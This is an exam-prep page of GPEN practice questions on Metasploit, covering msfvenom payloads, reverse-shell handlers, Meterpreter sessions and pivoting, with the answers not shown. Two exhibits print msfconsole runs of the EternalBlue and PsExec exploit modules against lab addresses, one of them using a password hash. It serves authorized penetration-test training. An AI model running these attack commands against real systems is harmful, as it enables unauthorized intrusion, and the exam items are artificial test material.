Courseiva

GPEN · topic practice

Metasploit practice questions

This domain covers the Metasploit Framework as used in authorized penetration testing: module selection, payload generation with msfvenom, handler configuration, and post-exploitation session management. GPEN questions test practical command recall—how to background and resume sessions, set LHOST/LPORT for reverse shells, and build encoded payloads that avoid bad characters.

Courseiva uses original exam-style practice questions designed for learning and revision. The goal is to understand the concepts, recognise exam patterns, and improve through explanations — not memorise copied exam dumps.

Editorial oversight:Johnson Ajibi· MSc IT Security, IEEE Senior Member
20 questionsDomain: Metasploit

What the exam tests

What to know about Metasploit

Be able to run msfconsole, search and use modules, set RHOSTS, LHOST, and LPORT correctly, generate payloads with msfvenom, and manage sessions. The critical skill is knowing which host LHOST must reference so the reverse shell returns to your handler.

Using the sessions command and session IDs to interact with or background Meterpreter and shell sessions

Setting LHOST and LPORT so reverse payloads connect back to the tester's listener

Generating Linux ELF and other payloads with msfvenom, including encoder selection

Configuring exploit modules, options, and multi/handler for staged and stageless payloads

Watch out for

Common Metasploit exam traps

  • ▸Confusing background with exit or Ctrl-Z; candidates forget the session persists and must be resumed with sessions -i
  • ▸Setting LHOST to the target's address instead of the tester's reachable interface for the reverse connection
  • ▸Assuming an encoder guarantees AV evasion; encoding primarily removes bad characters and reshapes the payload

Practice set

Metasploit questions

20 questions · select your answer, then reveal the explanation

Which TWO of the following steps are required to properly configure a multi-handler exploit listener for a reverse TCP payload?

Question 2mediummultiple choice
Read the full Metasploit explanation →

Which Metasploit post-exploitation module is best suited for gathering stored credentials from a compromised Windows machine?

Question 3mediummulti select
Read the full Metasploit explanation →

Which THREE actions can be performed directly within a Meterpreter session?

Which TWO settings are absolutely necessary for an auxiliary scanner to function against a target?

Question 5mediummultiple choice
Read the full Metasploit explanation →

A tester has a Meterpreter session on a Windows 10 host but needs to execute a PowerShell script that is only available on the attacker's machine, without writing the script to disk on the target. Which Meterpreter command should the tester use?

Question 6mediummultiple choice
Review the full subnetting walkthrough →

A penetration tester has gained a Meterpreter session on a Windows host and wants to route all subsequent Metasploit traffic through that session to reach an isolated internal subnet. Which Metasploit command should the tester run to add the target network to the route table?

Question 7hardmultiple choice
Review the full subnetting walkthrough →

A penetration tester is using Metasploit and wants to pivot into an internal network through a compromised dual-homed Windows host. The tester has a Meterpreter session on the host and needs to route traffic from Metasploit modules to the internal subnet 10.10.10.0/24. Which sequence of commands should the tester use?

Question 8mediummultiple choice
Read the full Metasploit explanation →

A penetration tester has a Meterpreter session on a Windows 10 host and wants to execute a PowerShell script that is stored on the target at C:\\Tools\\enum.ps1 without writing the script content into the Meterpreter command line. Which Meterpreter command should the tester use?

Question 9hardmultiple choice
Read the full Metasploit explanation →

During a penetration test, a tester uses msfvenom to generate a Windows executable payload. The tester wants the payload to connect back to the attacker's machine at 192.168.1.50 on port 4444, but the generated file fails to execute on the target. The target is a 64-bit Windows 10 system with no antivirus. Which msfvenom option is most likely missing or incorrect in the command that generated the payload?

Question 10mediummulti select
Read the full Metasploit explanation →

A penetration tester is configuring a Metasploit exploit module that requires a reverse HTTPS payload to bypass egress filtering. The tester needs to ensure the payload connects back to the correct host and port and that the listener is properly set up. Which two actions must the tester perform? (Choose two.)

Question 11mediummulti select
Review the full routing breakdown →

A penetration tester has compromised a Windows host and obtained a Meterpreter session. The tester now wants to use the compromised host as a pivot to scan an internal network. Which two actions must the tester perform to enable Metasploit modules to route traffic through the session? (Choose two.)

Question 12mediummultiple choice
Read the full Metasploit explanation →

A penetration tester has an active Meterpreter session on a Windows 10 host. The tester needs to run a PowerShell script that resides on the target's C:\Temp\cleanup.ps1 without uploading a separate payload or opening a new session. Which Meterpreter command should the tester use?

Question 13easymultiple choice
Read the full Metasploit explanation →

A penetration tester has gained a Meterpreter session on a Linux server and wants to escalate privileges by exploiting a local kernel vulnerability. Which Metasploit module type is specifically designed for this purpose?

Question 14mediummulti select
Read the full Metasploit explanation →

A penetration tester is preparing a Metasploit resource script to automate a repeatable engagement workflow. The script must set global datastore values that apply to all modules and then launch a specific auxiliary scanner. Which two resource script commands should the tester use to accomplish these goals? (Choose two.)

Question 15mediummultiple choice
Read the full Metasploit explanation →

Which command in the Metasploit Framework allows a user to interact with a backgrounded session after a successful exploit execution?

Question 16mediummultiple choice
Read the full Metasploit explanation →

Refer to the exhibit. Why did the EternalBlue exploit attempt fail despite the scanner identifying the target as vulnerable?

Exhibit

msf6 > search type:exploit platform:windows smb
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.50
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] 192.168.1.50:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.1.50:445 - Host is likely VULNERABLE to MS17-010!
[*] 192.168.1.50:445 - Scanned 1 of 1 hosts (1 succeeded to be vulnerable)
[*] 192.168.1.50:445 - Starting exploit
[!] Error: Exploit failed: The target is not exploitable.
Question 17easymultiple choice
Read the full Metasploit explanation →

What is the purpose of the 'meterpreter' payload in the Metasploit framework?

Question 18hardmultiple choice
Read the full Metasploit explanation →

Refer to the exhibit. What is the most likely cause of the 'Connection reset by peer' error when using the PsExec module?

Exhibit

msf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.5
msf6 exploit(windows/smb/psexec) > set SMBUser admin
msf6 exploit(windows/smb/psexec) > set SMBPass 328d3f1c12d2...[truncated]
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.10.2:4444
[*] 10.10.10.5:445 - Connecting to the target...
[*] 10.10.10.5:445 - Authenticating with 10.10.10.5:445 as user 'admin'...
[-] 10.10.10.5:445 - Exploit failed: RubySMB::Error::CommunicationError: Connection reset by peer
Question 19mediummultiple choice
Read the full Metasploit explanation →

Which of the following describes the function of the 'msfvenom' tool within the Metasploit ecosystem?

Question 20easymultiple choice
Read the full Metasploit explanation →

In Metasploit, what is the significance of the 'LHOST' parameter when setting up a reverse shell?

Free account

Track your progress over time

Create a free account to save your results and see which topics improve across sessions.

Focused Metasploit sessions

Start a Metasploit only practice session

Every question in these sessions is drawn from the Metasploit domain — nothing else.

Related practice questions

Related GPEN topic practice pages

Move into related areas when this topic feels solid.

Frequently asked questions

What does the GPEN exam test about Metasploit?
Be able to run msfconsole, search and use modules, set RHOSTS, LHOST, and LPORT correctly, generate payloads with msfvenom, and manage sessions. The critical skill is knowing which host LHOST must reference so the reverse shell returns to your handler.
How should I use these practice questions?
Select your answer before revealing the explanation. Then read why each option is right or wrong — this active recall approach builds retention far faster than re-reading notes.
Can I practise just Metasploit questions in a focused session?
Yes — the session launcher on this page draws every question from the Metasploit domain. Use a 10-question session first to gauge your baseline, then move to 20 or 30 once the weak spots are clear.
Where can I practise other GPEN topics?
Use the topic links above to move to related areas, or go back to the GPEN question bank to see all topics.
Are these real exam questions or dumps?
These are original practice questions written to test the same concepts the GPEN exam covers. They are not copied from any real exam or dump site.